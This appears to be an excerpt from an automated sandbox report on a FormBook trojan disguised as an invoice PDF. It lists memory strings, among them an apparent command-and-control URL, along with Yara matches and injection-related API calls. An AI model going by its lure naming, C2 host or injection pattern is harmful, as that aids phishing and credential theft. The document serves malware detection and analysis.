Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.resellnexa.shop
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.resellnexa.shop/sfpe/
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033y
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RpcPing.exe, 00000008.00000003.2428440920.00000000084B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: initial sample Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0042BFF3 NtClose, 3_2_0042BFF3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52B60 NtClose,LdrInitializeThunk, 3_2_01A52B60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_01A52DF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_01A52C70
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A535C0 NtCreateMutant,LdrInitializeThunk, 3_2_01A535C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A54340 NtSetContextThread, 3_2_01A54340
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A54650 NtSuspendThread, 3_2_01A54650
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BA0 NtEnumerateValueKey, 3_2_01A52BA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52B80 NtQueryInformationFile, 3_2_01A52B80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BE0 NtQueryValueKey, 3_2_01A52BE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BF0 NtAllocateVirtualMemory, 3_2_01A52BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AB0 NtWaitForSingleObject, 3_2_01A52AB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AF0 NtWriteFile, 3_2_01A52AF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AD0 NtReadFile, 3_2_01A52AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DB0 NtEnumerateKey, 3_2_01A52DB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DD0 NtDelayExecution, 3_2_01A52DD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D30 NtUnmapViewOfSection, 3_2_01A52D30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D00 NtSetInformationFile, 3_2_01A52D00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D10 NtMapViewOfSection, 3_2_01A52D10
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CA0 NtQueryInformationToken, 3_2_01A52CA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CF0 NtOpenProcess, 3_2_01A52CF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CC0 NtQueryVirtualMemory, 3_2_01A52CC0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C00 NtQueryInformationProcess, 3_2_01A52C00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C60 NtCreateKey, 3_2_01A52C60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FA0 NtQuerySection, 3_2_01A52FA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FB0 NtResumeThread, 3_2_01A52FB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F90 NtProtectVirtualMemory, 3_2_01A52F90
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FE0 NtCreateFile, 3_2_01A52FE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F30 NtCreateSection, 3_2_01A52F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F60 NtCreateProcessEx, 3_2_01A52F60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52EA0 NtAdjustPrivilegesToken, 3_2_01A52EA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52E80 NtReadVirtualMemory, 3_2_01A52E80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52EE0 NtQueueApcThread, 3_2_01A52EE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52E30 NtWriteVirtualMemory, 3_2_01A52E30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53090 NtSetValueKey, 3_2_01A53090
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53010 NtOpenDirectoryObject, 3_2_01A53010
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A539B0 NtGetContextThread, 3_2_01A539B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53D10 NtOpenProcessToken, 3_2_01A53D10
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53D70 NtOpenThread, 3_2_01A53D70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A54340 NtSetContextThread,LdrInitializeThunk, 8_2_03A54340
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A54650 NtSuspendThread,LdrInitializeThunk, 8_2_03A54650
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_03A52BA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_03A52BE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_03A52BF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52B60 NtClose,LdrInitializeThunk, 8_2_03A52B60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AF0 NtWriteFile,LdrInitializeThunk, 8_2_03A52AF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AD0 NtReadFile,LdrInitializeThunk, 8_2_03A52AD0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FB0 NtResumeThread,LdrInitializeThunk, 8_2_03A52FB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FE0 NtCreateFile,LdrInitializeThunk, 8_2_03A52FE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F30 NtCreateSection,LdrInitializeThunk, 8_2_03A52F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_03A52E80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_03A52EE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03A52DF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DD0 NtDelayExecution,LdrInitializeThunk, 8_2_03A52DD0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_03A52D30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_03A52D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_03A52CA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C60 NtCreateKey,LdrInitializeThunk, 8_2_03A52C60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_03A52C70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A535C0 NtCreateMutant,LdrInitializeThunk, 8_2_03A535C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A539B0 NtGetContextThread,LdrInitializeThunk, 8_2_03A539B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52B80 NtQueryInformationFile, 8_2_03A52B80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AB0 NtWaitForSingleObject, 8_2_03A52AB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FA0 NtQuerySection, 8_2_03A52FA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F90 NtProtectVirtualMemory, 8_2_03A52F90
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F60 NtCreateProcessEx, 8_2_03A52F60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52EA0 NtAdjustPrivilegesToken, 8_2_03A52EA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52E30 NtWriteVirtualMemory, 8_2_03A52E30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DB0 NtEnumerateKey, 8_2_03A52DB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D00 NtSetInformationFile, 8_2_03A52D00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CF0 NtOpenProcess, 8_2_03A52CF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CC0 NtQueryVirtualMemory, 8_2_03A52CC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C00 NtQueryInformationProcess, 8_2_03A52C00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53090 NtSetValueKey, 8_2_03A53090
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53010 NtOpenDirectoryObject, 8_2_03A53010
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53D10 NtOpenProcessToken, 8_2_03A53D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53D70 NtOpenThread, 8_2_03A53D70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288B30 NtReadFile, 8_2_03288B30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_032889D0 NtCreateFile, 8_2_032889D0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288E20 NtAllocateVirtualMemory, 8_2_03288E20
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288C20 NtDeleteFile, 8_2_03288C20
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288CC0 NtClose, 8_2_03288CC0
Detected potential crypto function
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_00D6D5BC 0_2_00D6D5BC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E8350 0_2_070E8350
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E2208 0_2_070E2208
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E42E0 0_2_070E42E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E1DD0 0_2_070E1DD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E3A08 0_2_070E3A08
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E1998 0_2_070E1998
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00418163 3_2_00418163
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004030C0 3_2_004030C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004011D0 3_2_004011D0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00401A70 3_2_00401A70
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040FA7A 3_2_0040FA7A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004022F7 3_2_004022F7
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040FA83 3_2_0040FA83
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416340 3_2_00416340
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416343 3_2_00416343
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00402300 3_2_00402300
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004024E0 3_2_004024E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040FCA3 3_2_0040FCA3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040DD20 3_2_0040DD20
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040DD23 3_2_0040DD23
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0042E5F3 3_2_0042E5F3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040DE69 3_2_0040DE69
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE01AA 3_2_01AE01AA
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD41A2 3_2_01AD41A2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD81CC 3_2_01AD81CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10100 3_2_01A10100
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABA118 3_2_01ABA118
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA8158 3_2_01AA8158
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB2000 3_2_01AB2000
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE03E6 3_2_01AE03E6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A2E3F0 3_2_01A2E3F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADA352 3_2_01ADA352
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA02C0 3_2_01AA02C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC0274 3_2_01AC0274
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE0591 3_2_01AE0591
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20535 3_2_01A20535
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ACE4F6 3_2_01ACE4F6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC4420 3_2_01AC4420
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD2446 3_2_01AD2446
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A1C7C0 3_2_01A1C7C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20770 3_2_01A20770
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A44750 3_2_01A44750
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3C6E0 3_2_01A3C6E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A229A0 3_2_01A229A0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AEA9A6 3_2_01AEA9A6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A36962 3_2_01A36962
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A068B8 3_2_01A068B8
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4E8F0 3_2_01A4E8F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A22840 3_2_01A22840
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A2A840 3_2_01A2A840
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD6BD7 3_2_01AD6BD7
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADAB40 3_2_01ADAB40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A1EA80 3_2_01A1EA80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A38DBF 3_2_01A38DBF
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A1ADE0 3_2_01A1ADE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A2AD00 3_2_01A2AD00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABCD1F 3_2_01ABCD1F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC0CB5 3_2_01AC0CB5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10CF2 3_2_01A10CF2
